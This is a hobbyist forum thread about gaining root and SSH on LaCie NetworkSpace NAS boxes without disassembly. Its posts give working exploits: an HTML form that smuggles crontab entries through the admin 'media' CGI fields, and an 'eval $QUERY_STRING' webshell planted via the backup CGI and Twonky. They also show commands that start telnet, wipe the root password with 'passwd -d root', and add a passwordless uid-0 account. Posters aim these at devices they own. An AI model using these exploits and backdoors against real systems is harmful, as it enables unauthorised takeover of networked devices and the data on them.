add ssh without dissambling

belese
Posts: 16
Joined: Sun Apr 19, 2009 9:44 pm

Re: add ssh without dissambling

Post by belese » Wed Jul 01, 2009 11:24 am

otherwhise,
you can try to put in the destination folder :

/www/cgi-bin/admin/home

and access webshell via : ...admin/home/'your dir'/webshell.

i don't try it, but maybe it's a solution (depend if it create dir or not).

belese

hardel09
Posts: 6
Joined: Sat Jul 18, 2009 1:43 pm

Re: add ssh without dissambling

Post by hardel09 » Sat Jul 18, 2009 2:09 pm

Hello,

It is possible with latest firmware to install webshell, or run directly telnet, using crontab. To do that you have only to save this html and enter the command you want to run:

<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1' />
<title>Hack NAS</title>
<link rel='stylesheet' href='/css/lacie.css' type='text/css' />
</head>
<body>
<form name='edit_form' method='post' action='http://192.168.1.66/cgi-bin/admin/media'>
<input type='hidden' id='autoscn' name='autoscn' value=true>
<input type='hidden' id='modified' name='modified' value='true'>
<input name='hour' value='2>'><input name='minute' value='16 15 * * * sh /home/openshare/hack.sh > /home/openshare/scriptrunok '>

<input type=submit value='SET CRONTAB'>
</body>
</html>


Change 192.168.1.66 with the ip of your LACIE NAS, and 16 15 with the minutes/hours you want to execute the script.
Here it was 15:16. (but if you're not a newbie in Linux as I am it will be clear for you).

I compiled lots of tutorials to install ssh: here is the result: it works !!

Connect via telnet and install ipkg:
wget http://ipkg.nslu2-linux.org/feeds/optwa ... 10_arm.ipk
tar -xOvzf ipkg-opt_*_arm.ipk ./data.tar.gz | tar -C / -xzvf -
mkdir -p /opt/etc/ipkg
echo "src armel http://ipkg.nslu2-linux.org/feeds/optwa ... oss/stable" > /opt/etc/ipkg/armel-feed.conf
/opt/bin/ipkg update

Install openssh via ipkg:
/opt/bin/ipkg install openssh

Create a new user, here new_root into /etc/passwd i add:
new_root:x:0:0:Linux User,,,:/home:/bin/sh

put an empty password for new_root into /etc/shadow i add:
new_root::12488:0:99999:7:::

Create a password for new_root: passwd new_root

Install ssh to run on each startup:
ln -s /opt/etc/init.d/S40sshd /etc/rc.d/rc3.d/

Thats all.

Dekonass
Posts: 2
Joined: Sun Jul 19, 2009 8:27 am

Re: add ssh without dissambling

Post by Dekonass » Sun Jul 19, 2009 8:44 am

belese wrote:Hi,

i found a way to add webshell without dissassembling.

it suppose you have acces to admin of twonkymedia

http://lacie.nas-central.org/wiki/Netwo ... diaServers

First you have to create a file Webshell and copy it to a folder on an usb key

Code: Select all

#!/bin/sh 
echo "Content-type: text/plain"
echo ""
echo $QUERY_STRING
eval $QUERY_STRING
Plug the usb key on the NAS.

i can't upload file so copy this code on a html page :

Code: Select all

<html>
<head>
	<title>Backup</title>
	<script language='Javascript'>
	function submitForm()
	{
		document.edit_form.action = 'http://' + document.getElementById('ipnas').value + '/cgi-bin/admin/backup';
		document.edit_form.submit();
	}
	</script>
</head>
<body>

<form name='edit_form' method='post' >

Nas Ip adress or Name
</br>
<input tyte='text' name='ipnas' id='ipnas' value='NetworkSpace' size='60'>
</br>

Source (Path to folder and not file on usbkey)
(Not / at the end)
</br>
<input tyte='text'  name='select2' id='select2'  value='/home/usbdisksdb1/webshell' size='60'>
</br>

Destination (Normally, don't modify)
(Not / at the end)
</br>
<input tyte='text' name='select1' id='select1' value='/www/cgi-bin/admin' size='60'>
</br>

<input type='hidden' id='update' name='update' value='true'>

</br>
<a href='javascript:submitForm();'>Copy</a>

</form>

</body>
</html>


open it, complete with correct value and click copy

it will display an error, but copy the file but it create a directory with a timestamp.

so to know the name of the directory.

http://your ip:9000/rpc/set_option?contentbase=/

no go to a config page of twonky media(http://your ip:9000/config), and look for a directory, you have now acces to all directory.
go to "/www/cgi-bin/admin/"
there is there the directory with the time-stamp.

copy it and paste to :
http://your ip/cgi-bin/admin/your directory/webshell?

webshell is now working.

after you can follow the procedure here :

http://jebimony.com/blog/content/add-ss ... -edmini-v2
Hi Mate,

Thanks a lot for your work.

This link http://jebimony.com/blog/content/add-ss ... -edmini-v2 is very hard to complete :)

So I hack mine like this:

Copy "utelnetd" to /www/cgi-bin/admin/my_time_dir or to /home/openshare/utelnetd by network /openshare/utelnetd

Then activate telnet, with:

Code: Select all

http://MY_LACIE_IP/cgi-bin/admin/kg-2009071820071247947833/webshell?/home/openshare/utelnetd

http://192.168.1.68/cgi-bin/admin/kg-2009071820071247947833/webshell?/home/openshare/utelnetd
Browser post this:

Code: Select all

telnetd: starting
  port: 23; interface: any; login program: /bin/login
Then with putty i telnet lacie, but i have no root passwd!!!

So the easy way i found:

Code: Select all

http://192.168.1.68/cgi-bin/admin/kg-2009071820071247947833/webshell?/usr/bin/passwd -d root
Browser post this:

Code: Select all

/usr/bin/passwd -d root
Password changed.
Next telnet with putty, and it's done:
192.168.1.68 login: root



BusyBox v1.1.0 (2006.11.03-14:53+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

192.168.1.68 /root #
192.168.1.68 /root #
Linux:
FILMES /root # uname -a
Linux FILMES 2.6.12.6-arm1 #2 Thu Aug 14 16:36:28 CEST 2008 armv5tejl unknown
Partitions:

Code: Select all

Disk /dev/sda: 1000.2 GB, 1000204886016 bytes
255 heads, 63 sectors/track, 121601 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes

   Device Boot    Start       End    Blocks   Id  System
/dev/sda1               1         125     1004031    5  Extended
/dev/sda2             126      121601   975755970   83  Linux
/dev/sda5               1          16      128457   82  Linux swap
/dev/sda6              17          17        8001   83  Linux
/dev/sda7              18          18        8001   83  Linux
/dev/sda8              19          40      176683+  83  Linux
/dev/sda9              41         124      674698+  83  Linux
/dev/sda10            125         125        8001   83  Linux

Disk /dev/sdb: 1051 MB, 1051197440 bytes
14 heads, 13 sectors/track, 11280 cylinders
Units = cylinders of 182 * 512 = 93184 bytes

   Device Boot    Start       End    Blocks   Id  System
/dev/sdb1               1       11281     1026528    6  FAT16
Tanks in advance for your work!!!

Dekonass

User avatar
PartisanEntity
Posts: 34
Joined: Sat Dec 27, 2008 11:12 pm
Location: Vienna, Austria
Contact:

Re: add ssh without dissambling

Post by PartisanEntity » Sun Jul 19, 2009 7:19 pm

Sorry if this is obvious, I still have not quite grasped how to perform these steps.

In the original post there is a shell script, so do I have to copy that script, as well as the html file to a usb stick? (The shell doesn't seem to contain any meaningful code as far as I can tell which is why I am confused by it).

Thank you.
Web: cognitivecombine.com - OS's: Ubuntu 9.04 & Mac OSX 10.5

Dekonass
Posts: 2
Joined: Sun Jul 19, 2009 8:27 am

Re: add ssh without dissambling

Post by Dekonass » Mon Jul 20, 2009 8:01 am

PartisanEntity wrote:Sorry if this is obvious, I still have not quite grasped how to perform these steps.

In the original post there is a shell script, so do I have to copy that script, as well as the html file to a usb stick? (The shell doesn't seem to contain any meaningful code as far as I can tell which is why I am confused by it).

Thank you.
Copy on only this:

Code: Select all

#!/bin/sh 
echo "Content-type: text/plain"
echo ""
echo $QUERY_STRING
eval $QUERY_STRING
But, make this file in linux, or using notepad++ in windows, then copy to usb, or to lacie openshare using path /home/openshare is the same ...

See you,

User avatar
PartisanEntity
Posts: 34
Joined: Sat Dec 27, 2008 11:12 pm
Location: Vienna, Austria
Contact:

Re: add ssh without dissambling

Post by PartisanEntity » Mon Jul 20, 2009 10:31 am

Dekonass wrote:
PartisanEntity wrote:Sorry if this is obvious, I still have not quite grasped how to perform these steps.

In the original post there is a shell script, so do I have to copy that script, as well as the html file to a usb stick? (The shell doesn't seem to contain any meaningful code as far as I can tell which is why I am confused by it).

Thank you.
Copy on only this:

Code: Select all

#!/bin/sh 
echo "Content-type: text/plain"
echo ""
echo $QUERY_STRING
eval $QUERY_STRING
But, make this file in linux, or using notepad++ in windows, then copy to usb, or to lacie openshare using path /home/openshare is the same ...

See you,
Thanks very much for your response.

And what do I do with the html file, from where do I launch it?
Web: cognitivecombine.com - OS's: Ubuntu 9.04 & Mac OSX 10.5

Daan
Posts: 98
Joined: Thu Feb 05, 2009 8:46 pm

Re: add ssh without dissambling

Post by Daan » Mon Jul 20, 2009 4:35 pm

Open the html file in a browser on your desktop.

Hanoc
Posts: 1
Joined: Mon Sep 07, 2009 6:16 pm

Re: add ssh without dissambling

Post by Hanoc » Mon Sep 07, 2009 7:01 pm

Hi,

I haven't been able to execute the script in the Network Space.

I'll explain what I've done because maybe someone has a hint on how to continue.

The software version in my lacie is 1.1.6

The steps I followed are:

1. create a folder named "hack" openshare.
2. create a file named backdoor in openshare\hack\ with the sh file above in that thread (#!/bin/sh ...)
3. create a file named "index.html" in openshare with the html above in that thread (<html><head><title>Backup</title>...)
4. open the file index.html with a browser in your computer
5. changed the first input in that webpage to my network space ip
6. changed the second input in that webpage to /home/openshare/hack
7. left the last input in that webpage as it is /www/cgi-bin/admin
8. clicked copy

At this point i got the same error as described by Ferretz

Code: Select all

"df: /www/cgi-bin/admin: can't find mount point. /www/cgi-bin/admin/backup: line 131: [: -lt: unary operator expected"
I continued anyway.

9.get access to the twonkyvision administration as indicated here:

Code: Select all

http://lacie.nas-central.org/wiki/NetworkSpace:_MultimediaServers
10 access to twonkyvision configuration and go to basic setup > sharing in the left side menu
11 click on "browse" button in any of the Content Locations: inputs.
12 a onscreen pop up with the folder strcture should appear
13 browse to www > cgi-bin > admin
14 there should be a folder named hack-200003310303954473206 with the numbers representing your actual timestamp.
15 copy the name
16 go to

Code: Select all

http://your_lacie_disk_ip/cgi-bin/admin/webshell-xxxxxxxxxxxx/backdoor?whoami
it should say root.

My backdoor file did not get copied.

I tried a thousand combinations like coping files to
/www/cgi/bin/home
with no luck.

If i do the backup with some media files inside the folder hack the do get copied.
I successfully copied mp3, images and folders with this method but any strange file like .sh or text files does not get copied.
Also the mp3 files copied disapeared from the hacked folder or at lest did not get accessible via web.
I have been able to play mp3 uploaded that way with an url like that:

Code: Select all

http://192.168.0.22:9000/disk/music/O1$14$744776806$2758043027.mp3/audio.mp3
but not with that:

Code: Select all

http://192.168.0.22/cgi-bin/admin/hack-200003310303954472730/audio.mp3
Wich is the adress where I uploaded the mp3 in the first place.
Maybe the file did get moved or just made unacessible from web.

Of course i tried to upload a sh file with the name backdoor.mp3 with no luck.

In the other hand I've also tried the crontab methdo but I had no luck with that also.

I created the html file, set the ip to my ip and the origin file to my file executed it and set the minutes and seconds to a future time but i got a not found in

Code: Select all

http://192.168.0.22/cgi-bin/admin/media
I've checked with tomkyvision and I do not have the folder media.
Of course maybe I don't have the last version of the software.

Sorry for the redundancy, I had a little trouble getting all together the first time and, even if it did not work, I think it could be useful to someone.

SpecialeW
Posts: 13
Joined: Wed Sep 09, 2009 10:24 pm

Re: add ssh without dissambling

Post by SpecialeW » Fri Sep 11, 2009 10:07 pm

Hanoc,

you were able to find the find the folder using twonky I see, but what does it display if you go to http://networkspace/cgi-bin/admin/...
if you get a http 404 not found error, you probably have the wrong character encoding.
are you on a windows pc?

grtz

jackal
Posts: 1
Joined: Fri Sep 25, 2009 10:31 pm

Re: add ssh without dissambling

Post by jackal » Fri Sep 25, 2009 10:43 pm

I also have version 1.1.8. The file did get uploaded to the correct dir at my system (you can check that by having the system copied *to* openshare).

If I would upload a file called "webshell", "hack", "imharmless" or whatever, it wouldn't be executed. For some reason, the file "config2" is executed, so I now got my own little webshell :-)

I'm not sure why this is so, maybe more on that some other time. Can others confirm this is working for 1.1.8 as well?

Good luck anyway... And thanks for all the tips!

P.S. You could also upload files through the twonkywonky, just set the upload dir appropriately. I think it will only upload actual media files (judging by the extensions)

mattylad
Posts: 61
Joined: Sat Jul 11, 2009 10:20 pm

Re: add ssh without dissambling

Post by mattylad » Thu Nov 05, 2009 6:24 pm

Can I ask if this will in any way upset the way it is currently running?

I dont want to lose my data.
Dumb Windows user & 500gb Network Store owner.
I'm not compatible with Linux :(

lacienas
Posts: 9
Joined: Sat Feb 06, 2010 7:39 am

Re: add ssh without dissambling

Post by lacienas » Mon Feb 08, 2010 5:55 pm

If I go to:

http://MYIP/www/cgi-bin/admin

It couldn't be find?
Could you help me?

Daan
Posts: 98
Joined: Thu Feb 05, 2009 8:46 pm

Re: add ssh without dissambling

Post by Daan » Wed Feb 10, 2010 4:56 pm

There are several more polished guides to hacking the NetworkSpace:

http://beinfamous.blogspot.com/2009/08/ ... art-i.html
http://doyouhateme.bizarro.org.uk/2009/ ... thout.html
http://blog.hendricksen.eu/2009/07/29/g ... he-device/

Try one of these, they are based on belese's hack but probably easier to follow.

CUnknown
Posts: 22
Joined: Mon Dec 28, 2009 11:32 am

Re: add ssh without dissambling

Post by CUnknown » Mon Feb 15, 2010 1:11 am

Maybe it's time to make a thread with one working sollution for version 1.18 (networkspace 1) and make that thread a sticky in this subforum?

It's getting confusing...

Ferretz
Posts: 3
Joined: Wed Jun 24, 2009 3:18 am

Re: add ssh without dissambling

Post by Ferretz » Mon Feb 15, 2010 2:11 am

I agree

The only approach i have managed to get working is the crontab method, i.e.

http://blog.hendricksen.eu/2009/07/29/g ... he-device/

The information on that page was clear and worked first time, so it gets my vote :D

Ackk Ooop.

Post Reply